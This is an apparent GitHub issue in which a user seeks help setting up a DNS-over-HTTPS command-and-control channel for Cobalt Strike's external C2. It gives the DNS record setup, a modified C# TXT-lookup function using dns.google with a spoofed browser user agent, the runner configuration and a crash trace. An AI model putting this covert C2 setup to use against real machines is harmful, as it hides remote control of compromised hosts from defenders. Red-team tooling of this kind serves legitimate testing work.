Stager dies after communication. Help needed

[hackabean]

Hello I hope you will be able to help me as we are trying to replicate your project in our environment.

This is what I have done so far:
Created A records with entry.mydomain.com pointing to my IP address.

Created NS records send.mydomain.com point to entry.mydomain.com
Created NS records receive.mydomain.com point to entry.mydomain.com

Next updated DoHC2.py accordingly so :
INPUTDOMAIN points to send.mydomain.com
OUTPUTDOMAIN points to receive.mydomain.com

Created ExternalC2.dll library with amended lines to force dns.google:

``
public List getTxtRecords(string hostname)
{
List txtResponses = new List();

        string url = String.Format("{0}?name={1}&type=TXT", dohResolver, hostname);

        Console.WriteLine("[URL] {0}", url);

        ServicePointManager.SecurityProtocol = SecurityProtocolType.Tls| SecurityProtocolType.Tls11| SecurityProtocolType.Tls12| SecurityProtocolType.Ssl3;

        HttpWebRequest request = (HttpWebRequest)HttpWebRequest.Create(new Uri(url));
        request.UserAgent = "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR 1.0.3705;)";
        request.Accept = "application/dns-json";
        request.Host = "dns.google.com";

        using (HttpWebResponse response = (HttpWebResponse)request.GetResponse())
        using (Stream stream = response.GetResponseStream())
        using (StreamReader reader = new StreamReader(stream))
        {
            var json = reader.ReadToEnd();
            try{
                JObject result = JObject.Parse(json);
                for (int i = 0; i < result["Answer"].Count(); i++)
                {
                    string data = (string)result["Answer"][i]["data"];
                    txtResponses.Add(data.Replace("\"", ""));
                    Console.WriteLine("[TXT] {0}", data.Replace("\"", ""));
                }
            }
            catch
            {
                txtResponses.Add("");
            }
        }

       
        System.Threading.Thread.Sleep(100);
        return txtResponses;
    }

``
Compilation was successful. Next I have built DoHC2Runner specifying:

DoHC2 doh = new DoHC2(); doh.Configure("<INPUTDOMAIN>","<OUTPUTDOMAIN>","https://dns.google.com/resolve"); doh.Go();

Started external C2 server with a script to listen on port 2222 and started DoHC2.py server to listen on port 53.

After I launch the runner from Windows 10 x64 machine I can see the communication being send in base64 and received back in base64 on the DoHC2.py server running on the VPS instance.

This is where external C2 crashes with an error:

Cobalt Strike external C2: [+] External C2 Server up on 0.0.0.0:2222 java.net.SocketException: Connection reset at java.base/java.net.SocketInputStream.read(SocketInputStream.java:186) at java.base/java.net.SocketInputStream.read(SocketInputStream.java:140) at java.base/java.io.BufferedInputStream.fill(BufferedInputStream.java:252) at java.base/java.io.BufferedInputStream.read1(BufferedInputStream.java:292) at java.base/java.io.BufferedInputStream.read(BufferedInputStream.java:351) at java.base/java.io.FilterInputStream.read(FilterInputStream.java:107) at extc2.ExternalC2Session.Read4(Unknown Source) at extc2.ExternalC2Session.run(Unknown Source) at java.base/java.lang.Thread.run(Thread.java:834) [-] Trapped java.net.SocketException during External C2 session [External C2 client]: Connection reset java.io.IOException: Read expected 4 byte length, read: -1 at extc2.ExternalC2Session.Read4(Unknown Source) at extc2.ExternalC2Session.run(Unknown Source) at java.base/java.lang.Thread.run(Thread.java:834) [-] Trapped java.io.IOException during External C2 session [External C2 client]: Read expected 4 byte length, read: -1

I would welcome your input on this one. Thanks for putting an effort into creating this. Let me know if you need more information.